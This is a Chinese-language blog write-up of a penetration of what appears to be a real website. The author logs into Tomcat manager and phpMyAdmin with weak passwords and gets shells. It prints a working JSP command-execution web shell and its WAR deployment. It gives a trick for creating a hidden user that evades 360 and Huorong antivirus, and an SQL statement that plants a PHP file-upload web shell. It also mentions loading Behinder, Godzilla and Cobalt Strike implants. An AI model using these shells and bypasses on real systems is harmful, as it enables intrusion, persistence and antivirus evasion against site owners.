【知识积累】遇到Tomcat和phpmyadmin的一次渗透

前言

  • 简单的渗透测试

开始

简单的看一下信息,发现ThinkPHP

看一看版本,3.2.3,百度搜了下,好像是可以反序列化注入,先放着,再搜集一下信息

把图片路径去掉,会发现个目录遍历,还没想到利用方式,没找到admin目录,信息越多突破口才更好找

再用nmapAutomator扫一波网站的端口信息,不错,开了3306,还有tomcat

直接去tomcat,常规的测试一下put,有可能开了readonly,但是没有,不允许

Tomcat弱口令

然后弱密码,登陆试试,惊喜,进了。可以直接war打包getshell了

其实这时还有个,就是上面指纹识别的多了一些信息,因为之前不是检测端口开放了3306吗,没想到tomcat上面会识别到phpmyadmin管理数据库,之前用网站目录没扫出来,估计域名访问的是ip:80/xx/index.php,所以现在直接用ip:8080访问就扫出来了吧,这时能拿shell的方法又有其他的可以尝试。

先试试这个了,先添加一个一句话木马

1
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

用jar打个包,简单理解一下 c是create,v是详细的意思不知道啥单词,f是file指定创建的war

接着上传就ok了

他会把cmd.war解压成cmd/1.jsp,我们访问这个路径就可以看到了

高权限,随即我执行命令,发现被拦截了,看了看进程,发现360

接着网上搜了个大马,试试能不能绕过,同样方法,上传大马,确实有个360

上传cs免杀马,结果自己做的太大了,算了,上传哥斯拉马,哥斯拉搞起

想上传cs马,结果没权限,因为没法上传文件

过360创建用户

这里写一个自己构造的bypass360创建用户的方法,可以进去人工关360

1
2
3
4
5
正常来写 
net user test$ Redteam123 /add 这样肯定会被360拦截,但是换一个写法

改写之后
net /add user test$ Redteam123 这样就能成功创建用户,亲测可以绕过360和火绒创建用户

PHPmyadmin方法记录

这里回到网站,另一种方法也记录一下,好久没碰phpmyadmin,在tomcat中检查指纹的时候,爆出有phpmyadmin,我们访问看看,我还想着是不是要利用刚刚拿到的shell去找mysql密码,结果root root就进去了。弱密码tql

还是基础操作,日志getshell,简单的猜一下目录

但是访问不进去

我怀疑是被杀了,上传个冰蝎马,思路是利用file_put_contents来post传上去

1
SELECT "<?php file_put_contents($_GET['name'],$_POST['ma']);?>"

然后发现可以访问了,接着利用这个写入要url编码一下冰蝎马,或者哥斯拉马,这里用冰蝎了

成功连上冰蝎

这次继续上cs马,没想到上去了,我做了个木马,太大了2Mo(╥﹏╥)o,太菜了

接着执行一下就上线了

结束

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【知识积累】遇到Tomcat和phpmyadmin的一次渗透

文章作者:孤桜懶契

发布时间:2021年11月09日 - 19:06:16

最后更新:2021年11月15日 - 20:58:33

原始链接:https://gylq.gitee.io/posts/177.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------